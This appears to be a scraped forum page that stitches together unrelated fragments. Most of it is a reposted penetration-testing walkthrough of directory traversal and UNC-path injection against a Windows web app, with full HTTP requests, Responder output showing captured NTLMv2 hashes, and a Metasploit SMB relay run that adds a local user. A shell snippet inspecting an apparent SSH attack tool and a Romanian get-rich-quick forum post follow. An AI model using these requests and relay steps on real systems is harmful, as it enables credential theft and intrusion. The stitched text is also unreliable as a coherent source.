Leaderboard

For some reason I've recently run into a number of web applications that allow for either directory traversal or filename manipulation attacks. These issues are typically used to expose web server specific files and sensitive information files (web.config, salaryreport.pdf, etc.) and/or operating system files (SYSTEM, SAM, etc.) Here's what a typical vulnerable request looks like: GET /Print/FileReader.aspx?Id=report1.pdf&Type=pdf HTTP/1.1 Host: example.com Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */* Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; ;Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR ;3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Cookie: ASP.NET_SessionId=ofaj1zdqr40rl2tjtpt3y1lf; Note the Id parameter in the URL. This is the vulnerable parameter that we will be attacking. We could easily change report1.pdf to any other file in the web directory (report2.pdf, web.config, etc.), but we can also turn our attack against the operating system. Here's an example request for the win.ini file from the web server: GET /Print/FileReader.aspx?Id=..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini&Type=pdf HTTP/1.1 Host: example.com Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */* Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; ;Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR ;3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Cookie: ASP.NET_SessionId=ofaj1zdqr40rl2tjtpt3y1lf; This is a more traditional directory traversal attack. We're moving up several directories so that we can go back into the Windows directory. Directory traversal attacks have been around for a long time, so this may be a pretty familiar concept. Now that we have the basic concepts out of the way, let's see how we can leverage it against internally deployed web applications. Internally deployed web applications can allow for a much wider attack area (RDP, SMB, etc.) against the web server. This also makes directory traversal and file specification attacks more interesting. Instead of just accessing arbitrary files on the system, why don't we try and access other systems in the environment. In order to pivot this attack to other systems on the network, we will be utilizing UNC file paths to capture and/or relay SMB credentials. As a point of clarification, the following examples are against web servers that are running on Windows. Following our previous examples, we will be using a UNC path to our attacking host, instead of report1.pdf for the parameter. Here's an example request: GET /Print/FileReader.aspx?Id=\\192.168.1.123\test.pdf&Type=pdf HTTP/1.1 Host: example.com Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */* Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; ;Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR ;3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Cookie: ASP.NET_SessionId=ofaj1zdqr40rl2tjtpt3y1lf; This will force the web server to look for test.pdf at 192.168.1.123. This will allow us to capture and crack the network hashes for the account running the web server service. Here's an example of how we would use https://github.com/SpiderLabs/Responder to do the SMB capture: python Responder.py -i eth0 NBT Name Service/LLMNR Answerer 1.0. Please send bugs/comments to: lgaffie@trustwave.com To kill this script hit CRTL-C [+]NBT-NS & LLMNR responder started [+]Loading Responder.conf File.. Global Parameters set: Responder is bound to this interface:eth0 Challenge set is: 1122334455667788 WPAD Proxy Server is:OFF WPAD script loaded:function FindProxyForURL(url, host){return 'PROXY ISAProxySrv:3141; DIRECT';} HTTP Server is:ON HTTPS Server is:ON SMB Server is:ON SMB LM support is set to:OFF SQL Server is:ON FTP Server is:ON DNS Server is:ON LDAP Server is:ON FingerPrint Module is:OFF Serving Executable via HTTP&WPAD is:OFF Always Serving a Specific File via HTTP&WPAD is:OFF [+]SMB-NTLMv2 hash captured from : ;192.168.1.122 Domain is : EXAMPLE User is : webserverservice [+]SMB complete hash is : webserverservice::EXAMPLE:1122334455667788: 58D4DB26036DE56CB49237BFB9E418F8:01010000000000002A5FB1391FFCCE010F06DF8E6FE85EB20000000002000A0073006D006200310032000100140053004500520056004500520032003000300038000400160073006D006200310032002E006C006F00630061006C0003002C0053004500520056004500520032003000300038002E0073006D006200310032002E006C006F00630061006C000500160073006D006200310032002E006C006F00630061006C000800300030000000000000000000000000300000620DD0B514EA55632219A4B83D1D6AAA07659ABA3A4BB54577C7AEEB871A88B90A001000000000000000000000000000000000000900260063006900660073002F00310030002E003100300030002E003100300030002E003100330036000000000000000000 Share requested: \\192.168.1.123\IPC$ [+]SMB-NTLMv2 hash captured from : ;192.168.1.122 Domain is : EXAMPLE User is : webserverservice [+]SMB complete hash is : webserverservice::EXAMPLE:1122334455667788: 57A39519B09AA3F4B6EE7B385CFB624C:01010000000000001A98853A1FFCCE0166E7A590D6DF976B0000000002000A0073006D006200310032000100140053004500520056004500520032003000300038000400160073006D006200310032002E006C006F00630061006C0003002C0053004500520056004500520032003000300038002E0073006D006200310032002E006C006F00630061006C000500160073006D006200310032002E006C006F00630061006C000800300030000000000000000000000000300000620DD0B514EA55632219A4B83D1D6AAA07659ABA3A4BB54577C7AEEB871A88B90A001000000000000000000000000000000000000900260063006900660073002F00310030002E003100300030002E003100300030002E003100330036000000000000000000 Share requested: \\192.168.1.123\test.pdf Once we've captured the credentials, we can try to crack them with oclHashcat - advanced password recovery. If the server responds with https://www.netspi.com/blog/entryid/63/automating-halflmchall-hash-cracking, you can use rainbow tables to speed things up. Once cracked, we can see where these credentials have access. Let's pretend that we are not able to crack the hash for the web server account. We can also try to relay these credentials to another host on the internal network (192.168.1.124) that the account may have access to. This can be done with the CVE-2008-4037 Microsoft Windows SMB Relay Code Execution | Rapid7 within Metasploit and Responder recently added support for SMB relay. In the example below, we will use the Metasploit module to add a local user to the target server (192.168.1.124). The typical usage/payload for the module is to get a Meterpreter shell on the target system. Module options (exploit/windows/smb/smb_relay): Name ; ; ; ;Current Setting ;Required ;Description ---- ; ; ; ;--------------- ;-------- ;----------- SHARE ; ; ; ADMIN$ ; ; ; ; ; yes ; ; ; The share to connect to SMBHOST ; ; 192.168.1.124 ; ;no ; ; ; ;The target SMB server SRVHOST ; ; 192.168.1.123 ; ;yes ; ; ; The local host to listen on. SRVPORT ; ; 445 ; ; ; ; ; ; ;yes ; ; ; The local port to listen on. SSL ; ; ; ; false ; ; ; ; ; ;no ; ; ; ;Negotiate SSL for incoming connections SSLCert ; ; ; ; ; ; ; ; ; ; ;no ; ; ; ;Path to a custom SSL certificate SSLVersion ;SSL3 ; ; ; ; ; ; no ; ; ; ;Specify the version of SSL that should be used Payload options (windows/adduser): Name ; ; ;Current Setting ;Required ;Description ---- ; ; ;--------------- ;-------- ;----------- CUSTOM ; ; ; ; ; ; ; ; ; ; no ; ; ; ;Custom group name to be used instead of default EXITFUNC ;thread ; ; ; ; ; yes ; ; ; Exit technique: seh, thread, process, none PASS ; ; ;Password123! ; ; yes ; ; ; The password for this user USER ; ; ;netspi ; ; ; ; ; yes ; ; ; The username to create WMIC ; ; ;false ; ; ; ; ; ;yes ; ; ; Use WMIC on the target to resolve administrators group Exploit running as background job. Server started. <------------Truncated------------> Received 192.168.1.122:21251 EXAMPLE\webserverservice LMHASH:b2--Truncated--03 NTHASH:46-- Truncated --00 OS: LM: Authenticating to 192.168.1.124 as EXAMPLE\webserverservice... AUTHENTICATED as EXAMPLE\webserverservice... Connecting to the defined share... Regenerating the payload... Uploading payload... Created \OemWSPRa.exe... Connecting to the Service Control Manager... Obtaining a service manager handle... Creating a new service... Closing service handle... Opening service... Starting the service... Removing the service... Closing service handle... Deleting \OemWSPRa.exe... Sending Access Denied to 192.168.1.122:21251 EXAMPLE\webserverservice https://www.netspi.com/blog/entryid/213/smb-attacks-through-directory-traversal

[root@SH-crew:/dev/shm/bssh]# strings ssh2 | grep @ [01;33mlan.tester@yahoo.com keepalive@libssh2.orgW hmac-ripemd160@openssh.com rijndael-cbc@lysator.liu.se keld@dkuug.dk

Vrei sa aflii cum am facut 388$ intr-o saptamana? Cel mai greu lucru pentru voi este sa aflati cum i-am facut Ca sa nu se duca naibii rapid aceasta metoda am sa o dau celor care au contribuit cu ceva pe acest forum , ex: un tutorial un program ceva, v-ati prins. Pentru a primii aceasta metoda postati aici, fara pm.

https://rstforums.com/forum/80108-vrei-sa-aflii-cum-am-facut-388-a.rst De ce suntem nevoiti sa suportam mizerii pe index? De ce nu vrea contact prin pm? CAND o sa trimita tutorialul? Cui o sa-i trimita tutorialul si care sunt criteriile pe care se va baza pentru selectie? Daca posteaza 400 de oameni si el ii da tutorialul doar unuia, merita haosul asta pe index? A verificat cineva ce metoda e? Exista metoda macar?